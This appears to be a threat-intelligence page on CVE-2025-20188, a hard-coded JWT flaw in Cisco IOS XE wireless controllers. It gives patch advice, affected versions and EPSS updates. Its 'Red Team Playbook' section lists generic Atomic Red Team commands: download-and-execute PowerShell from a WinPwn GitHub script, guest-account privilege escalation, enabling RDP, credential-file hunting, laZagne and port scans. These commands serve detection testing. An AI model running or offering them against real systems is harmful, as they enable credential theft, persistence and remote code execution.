CVE-2025-20188
Overview
This vulnerability is an authentication bypass and arbitrary file upload flaw caused by a hard-coded JSON Web Token (JWT) embedded within Cisco IOS XE Software for Wireless LAN Controllers. The flaw affects the Out-of-Band Access Point Image Download, Clean Air Spectral Recording, and client debug bundles features, allowing unauthorized access to the AP file upload interface. The root cause is the use of a static JWT that bypasses normal authentication checks on the HTTPS endpoint handling file uploads.
Vulnerability Description
A vulnerability in the Out-of-Band Access Point (AP) Image Download, the Clean Air Spectral Recording, and the client debug bundles features of Cisco IOS XE Software for Wireless LAN Controllers (WLCs) could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system. This vulnerability is due to the presence of a hard-coded JSON Web Token (JWT) on an affected system. An attacker could exploit this vulnerability by sending crafted HTTPS requests to the AP file upload interface. A successful exploit could allow the attacker to upload files, perform path traversal, and execute arbitrary commands with root privileges.
Impact
An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files and execute commands with root privileges on affected Cisco IOS XE Wireless LAN Controllers. No user interaction or prior authentication is required, and the attack can be performed remotely over the network via HTTPS. This enables full system compromise, including potential data exfiltration, device manipulation, and disruption of wireless network services. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the exploit requires no privileges or user interaction.
Solution
Cisco has released security updates addressing this vulnerability in IOS XE versions 17.11.101, 17.12.101, and later. Administrators should apply these patches as detailed in Cisco Security Advisory cisco-sa-wlc-file-uplpd-rHZG9UfC. No documented workarounds are available; immediate upgrade to the fixed software versions is recommended to mitigate the risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability exists within the Out-of-Band Access Point (AP) Image Download, Clean Air Spectral Recording, and client debug bundles features of Cisco IOS XE Software for Wireless LAN Controllers (WLCs). This vulnerability arises from the presence of a hard-coded JSON Web Token (JWT), which facilitates unauthorized access to the system. The flaw allows an unauthenticated, remote attacker to upload arbitrary files via crafted HTTPS requests directed at the AP file upload interface. Once exploited, this vulnerability can lead to path traversal attacks, enabling the execution of arbitrary commands with root privileges, thereby compromising the integrity and confidentiality of the affected systems.
The attack vectors associated with this vulnerability are particularly concerning due to their simplicity and effectiveness. An attacker can leverage the hard-coded JWT to bypass authentication mechanisms, sending specially crafted requests to the vulnerable interfaces. This exploitation could be executed from anywhere on the internet, making it accessible to a wide range of potential attackers. Once an attacker successfully uploads a malicious file, they could manipulate the system to execute commands that could lead to further exploitation, data exfiltration, or even complete system takeover. The ease of exploitation, combined with the high privileges that can be obtained, makes this vulnerability a significant threat to organizations relying on affected Cisco products.
In terms of real-world impact, the potential consequences of this vulnerability are severe. Organizations utilizing Cisco IOS XE Software for Wireless LAN Controllers may face substantial business risks, including data breaches, loss of sensitive information, and operational disruptions. The ability for an attacker to execute commands with root privileges means that they could alter configurations, disrupt services, or deploy additional malware within the network. This could lead to reputational damage, regulatory fines, and a loss of customer trust, particularly if sensitive data is compromised. Furthermore, the financial implications of remediation efforts and potential downtime could be significant, underscoring the importance of addressing this vulnerability promptly.
Detection and mitigation strategies are crucial in safeguarding against this vulnerability. Organizations should implement robust monitoring solutions to detect unusual activity related to the AP file upload interface. Regular audits of system configurations and access controls can help identify unauthorized changes or access attempts. Additionally, applying patches and updates provided by Cisco is essential to mitigate the risk associated with this vulnerability. Organizations should also consider employing network segmentation to limit the exposure of critical systems and implement strict firewall rules to restrict access to the vulnerable interfaces. Educating staff about the risks associated with such vulnerabilities and promoting a culture of cybersecurity awareness can further enhance an organization’s defense posture.
In conclusion, the vulnerability within Cisco IOS XE Software for Wireless LAN Controllers represents a critical threat that necessitates immediate attention. The combination of unauthenticated remote access, arbitrary file uploads, and the potential for command execution with root privileges creates a dangerous scenario for affected organizations. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare to defend against this vulnerability. Implementing effective detection and mitigation strategies will be vital in protecting sensitive data and maintaining operational integrity in the face of evolving cyber threats.
CSURFACE threat intelligence has identified a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-20188, rising by approximately 18%. This upward adjustment reflects a growing likelihood of exploitation attempts targeting the hard-coded JSON Web Token vulnerability in Cisco IOS XE Software for Wireless LAN Controllers. Although no new exploit techniques or proof-of-concept code have surfaced in our telemetry, the elevated EPSS score signals heightened attacker interest or improved feasibility of exploitation in operational environments. For defenders, this trend underscores an increased risk posture, warranting closer monitoring of network traffic and authentication anomalies related to affected devices. While the overall exploit landscape remains stable without a surge in active campaigns, the critical severity rating combined with the rising EPSS score suggests that threat actors may be preparing to leverage this vulnerability more aggressively. Consequently, the threat level for organizations running vulnerable Cisco WLCs is elevated, emphasizing the importance of vigilance even in the absence of confirmed exploit incidents.
Update 2 — July 09, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-20188, with telemetry indicating a doubling in observed attempts to exploit the vulnerability. This increase, while still limited in absolute terms, signals growing adversary interest and potential reconnaissance or preliminary exploitation efforts targeting Cisco IOS XE Wireless LAN Controllers. The persistence of a hard-coded JSON Web Token continues to present a critical attack vector, and the uptick in activity suggests threat actors may be intensifying their efforts to leverage this flaw before widespread patch adoption occurs. Although no new exploit techniques or proof-of-concept code have surfaced, the heightened detection trend elevates the immediacy of the threat and underscores the need for defenders to maintain heightened situational awareness. Consequently, the risk level for organizations operating affected devices should be considered elevated, reflecting an increased likelihood of targeted intrusion attempts exploiting this vulnerability.
Affected Products (7)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Ios Xe | 17.11.1 |
cpe:2.3:o:cisco:ios_xe:17.11.1:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 17.11.99sw |
cpe:2.3:o:cisco:ios_xe:17.11.99sw:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 17.12.1 |
cpe:2.3:o:cisco:ios_xe:17.12.1:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 17.12.2 |
cpe:2.3:o:cisco:ios_xe:17.12.2:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 17.12.3 |
cpe:2.3:o:cisco:ios_xe:17.12.3:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 17.13.1 |
cpe:2.3:o:cisco:ios_xe:17.13.1:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 17.14.1 |
cpe:2.3:o:cisco:ios_xe:17.14.1:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-70 | Try Common or Default Usernames and Passwords |
35%
|
Medium | High | |
| CAPEC-191 | Read Sensitive Constants Within an Executable |
33%
|
— | Low |
Red Team Playbook
36 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-20188 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC |
| horizon3.ai |
NVD API
Exploit
Third Party Advisory
|
https://horizon3.ai/attack-research/attack-blogs/cisco-ios-xe-wlc-arbitrary-file-upload-vulnerability-cve-2025-20188-analysis/ |